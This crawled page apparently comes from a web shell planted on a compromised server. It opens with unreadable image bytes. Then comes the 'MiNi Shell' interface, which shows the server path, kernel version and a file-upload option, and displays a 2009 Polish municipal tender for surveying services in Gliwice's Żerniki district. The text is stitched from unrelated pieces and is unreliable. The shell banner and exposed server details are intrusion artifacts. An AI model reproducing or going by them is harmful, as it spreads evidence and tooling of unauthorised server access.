JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090921/324808-N-2009.html

<p class="kh_header"><b>Gliwice: Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania: Modernizacja gospodarki ściekowej miasta</b><br>
<b>Numer ogłoszenia: 324808 - 2009; data zamieszczenia: 21.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gliwice, Wydział Inwestycji i Remontów , ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. +48 032 2385442, faks +48 032 2314058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjne na terenie dzielnicy Żerniki w Gliwicach w ramach zadania: Modernizacja gospodarki ściekowej miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie ogółu działań-czynności geodezyjnych mających na celu realizację założeń wyjściowych dla regulacji terenowo-prawnych (prowadzonych na wniosek PWiK Gliwice, przez wydziały IR i GN - UM Gliwice) obszaru, na którym zrealizowano roboty  zadania inwestycyjnego pn. Modernizacja gospodarki ściekowej dz. Żerniki w Gliwicach, w oparciu o  wstępne, niezbędne uzgodnienia z właścicielami terenu i dokumentację projektową z 2001r. pn. Budowa kanalizacji sanitarnej i deszczowej wraz z remontem i modernizacją ulic dzielnicy Żerniki w Gliwicach, autorstwa BPBK w Katowicach. 
 
Zamawiający dokonał podziału przedmiotu zamówienia na odrębne niżej wymienione części: 
Część I :
1) Rejon ulicy Bernardyńskiej;
Uporządkowanie sytuacji 5 działek (własności osób fizycznych ) o numerach 1009, 1010, 1011, 1013 i 1012 obrębu Szobiszowice, następująco: 
- geodezyjne wydzielenie pasa terenu szerokości ~3,5 m wzdłuż płn.-wsch. granicy działek nr 1009, 1010, 1011, 1013, tj. w pasie gdzie ułożono przewody kanalizacji sanitarnej ks250 i deszczowej kd400, z przypisaniem tak wydzielonemu terenowi służebności przejazdu dla działek o nr 1010, 1011, 1013;
Wymiar szerokości jw. określono orientacyjnie, ze względu na konieczność równoczesnego spełnienia warunku, żeby odległość ścian skrajnych elementów kanalizacji od granicy działki, nie była mniejsza od 0,5 m;
-  równoczesne scalenie działki 1012 z  działką 1013.
 
2) Rejon ulicy Dybowskiego;
Uporządkowanie sytuacji 13 działek (własności osób fizycznych)  o numerach: 513, 514, 516, 517, 518, 520, 521, 522, 523, 524, 526, 527, 528  obrębu Żerniki, następująco:
- poszerzenie pasa drogowego ulicy Dybowskiego - od strony płn.- zach. dz. nr 1659, kosztem ułamkowych części działek o numerach: 513, 514, 516, 517, 518, 520, 521, 522, 523, 524, 526, 527, 528 w obrębie Żerniki, położonych po parzystej stronie ulicy, wzdłuż linii podziału istniejących ogrodzeń posesji, a w przypadku ich braku po linii prostej wyznaczonej przez punkty skrajne ogrodzenia najbliższej działki (oraz po ostatecznym uzgodnieniu z właścicielem dzielonej działki);
- scalenie ww. działek i nadanie rodzaju droga.
 
3) Rejon ulicy Szymanowskiego;
Uporządkowanie sytuacji 2 działek (własności osób fizycznych) sąsiadujących z sobą, o numerach 1173 i 1174  obrębu Żerniki, następująco:
- poszerzenie pasa drogowego ulicy Szymanowskiego od strony  zachodniej kosztem ułamkowych części działek o numerach: 1173 i 1174 w obrębie Żerniki, położonych po parzystej stronie ulicy, wzdłuż linii podziału położonej w odległości  0,5 m od skrajni krawężnika jezdni 
- scalenie ww. działek  i  nadanie rodzaju droga.  (możliwość włączenia do pasa drogowego drogi publicznej-powiatowej - ulicy Szymanowskiego).
 
Część II 
1)  Rejon ulicy  Omańkowskiej;
Uporządkowanie sytuacji działek sąsiadujących z ulicą Omańkowskiej,  poprzez wydzielenie z nich ułamkowych części przyległych do granicy działki geodezyjnej ulicy, na których wykonano  przewody sieci kanalizacji sanitarnej i deszczowej oraz utwardzoną nawierzchnię drogową, w linii podziału położonej:
- 2,0 m licząc od krawężnika jezdni, na działkach osób fizycznych;
- w granicach pasa drogowego ulicy Omańkowskiej według aktualnego miejscowego planu zagospodarowania przestrzennego (PZP), na działkach gminy Gliwice. 
 
Wyżej opisane poszerzenie pasa drogowego ulicy Omańkowskiej dotyczy:
-  ułamkowych części  działek geodezyjnych w obrębie Żerniki, położonych po parzystej stronie ulicy tj. od strony południowej i południowo wschodniej, o numerach  (w nawiasach podano wcześniejszą numerację i właściciela: F-osoba fizyczna, G-G- gmina Gliwice): 1210/1 (280/1(F))-ul. Zgrzebnioka,  1255 (16(F)), 1256 (17(G-G)), 1258 (19(G-G)), 1291 (24(F)), 1293 (25(G-G)), 1294 (26(G-G))
-  ułamkowych części  działek geodezyjnych w obrębie Żerniki, położonych po nieparzystej stronie ulicy tj. od strony północnej i płn.-zachodniej, o numerach (w nawiasach podano wcześniejszą numerację i właściciela: F-osoba fizyczna, G-G- gmina Gliwice):  
1099 ( ? (F)), 1093 (6/1(F)), 1082 (7(F)), 1080 (13(F)), 1074 (14(F)), 1072 (16(F)), 1681 (59(G-G))/ ul.Paska, 1062 (29/1(F)), 1063 (29/2(F)), 1061 (30F(X)).
 
Wydzielone działki należy scalić w większe  jeśli sąsiadują ze sobą i nadać im rodzaj droga (możliwość docelowego włączenia do pasa drogowego drogi gminnej ulicy Omańkowskiej).  
Łącznie podziałowi podlega 17 działek obrębu Żerniki, w tym: 12 działek własności osób fizycznych   i 5  działek własności gminy Gliwice;     
 
Część III 
1)  Rejon ulicy Kadłubka;
Uporządkowanie sytuacji 7 działek o numerach 921, 922, 924, 925, 926, 927, 928  obrębu Żerniki (w tym: 4 działki własności osób fizycznych, a 3 działki o numerach 922, 926, 928 - własność gminy w użytkowaniu wieczystym osób fizycznych), następująco:
- poszerzenie pasa drogowego ulicy Kadłubka  od strony wschodniej  dz. nr 1677, kosztem ułamkowych części działek o numerach: 921, 922, 924, 925, 926, 927, 928, położonych po parzystej stronie ulic, wzdłuż linii podziału wyznaczonej  krawędzią jezdni.
- scalenie ww. działek i nadanie rodzaju droga. 
 
- dla terenów objętych zadaniem  obowiązują następujące miejscowe plany zagospodarowania przestrzennego (PZP):    
- PZP dla dz. Żerniki- Wschód zatwierdzony Uchwałą  RM nr XXI/576/2004 z 8 lipca 2004r,    
- PZP  dla dz. Żerniki- Zachód zatwierdzony Uchwałą RM nr XXV/658/2004 z 2 grudnia  2004r,
-  Dla Rejonu ulicy Bernardyńskiej - brak aktualnego PZP;
 
Wykonawcy usługi udostępnione będą:
-  ustalenia z właścicielami działek podlegających podziałowi, w tym z gminą Gliwice jako właścicielem (dotyczy rejonu ulicy Omańkowskiej)
-  materiały określające (wyjściowe) zamierzenia regulacji terenowo prawnej (opisowo i graficznie)
-  w oferowanej kwocie ryczałtowej należy ująć wszelkie koszty towarzyszące realizacji zamówienia w tym m.in. koszt  zamawianych map, odpisów KW, koniecznych uzgodnień,  opłat urzędowych itp. 
 
Zamawiający dopuszcza składanie ofert częściowych na w/w części.
Wykonawca może złożyć ofertę na wybrane przez siebie części zamówienia z zastrzeżeniem, że na każdą część wykonawcy złożą odrębną ofertę z uwzględnieniem poniższej uwagi;
 
UWAGA:
W przypadku składania przez wykonawcę ofert na więcej niż 1 część dokumenty potwierdzające spełnienie warunków udziału w postępowaniu o udzielenie zamówienia wykonawca zamieści w ofercie o najniższym numerze części.
 
Zamawiający rozstrzygnie postępowanie w jakiejkolwiek części, gdy wpłynie co najmniej jedna nie podlegająca odrzuceniu oferta.
 
Inne wymagania:
-  harmonogram terminowo-rzeczowo-finansowy należy sporządzić odrębnie dla każdej części zamówienia,
-  wyceny usługi należy sporządzić odrębnie dla każdej części zamówienia z tym, że wycena części I winna  zawierać równieź odrębne wyceny dla każdego Rejonu ulicy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.21.00-1, 71.35.50.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a) posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz niepodleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2 ustawy pzp), w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp, o którym mowa powyżej muszą spełniać wszystkie podmioty działające wspólnie, b) posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
Doświadczenie zawodowe:
Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie)ukończył z należytą starannością realizację co najmniej 2 zadań odpowiadających swoim rodzajem i wartością usługom stanowiących przedmiot zamówienia tj. wykonał co najmniej 2 podziały geodezyjne o wartości nie mniejszej niż 20.000,00 zł (brutto) każdy. 
Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel: tj. co najmniej 1 osobę z uprawnieniami zawodowymi do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii zgodnie z ustawą Prawo geodezyjne i kartograficzne z dnia 17 maja 1989r. (tekst jednolity Dz.U.nr 240 z 2005 r. poz.2027 z późn. zm.)
W przypadku podmiotów działających wspólnie osoby zdolne do wykonania zamówienia i doświadczenie zawodowe podlegają sumowaniu. .
c) znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania: - ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach na zasadzie spełnia/nie spełnia. - z treści złożonych dokumentów musi wynikać jednoznacznie, iż wykonawca spełnił warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) , - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników,  -aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, - wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami potwierdzającymi spełnienie warunku udziału w postępowaniu oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował, dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości,przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego: Urząd Miejski w Gliwicach, ul. Zwycięstwa 21, Biuro Obsługi Interesantów stanowisko ds zamówień publicznych, tel. 032 239-12-56, faks 032 231-27-25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 10:00, miejsce: siedziba zamawiającego: Urząd Miejski w Gliwicach, ul. Zwycięstwa 21, Biuro Obsługi Interesantów stanowisko ds zamówień publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com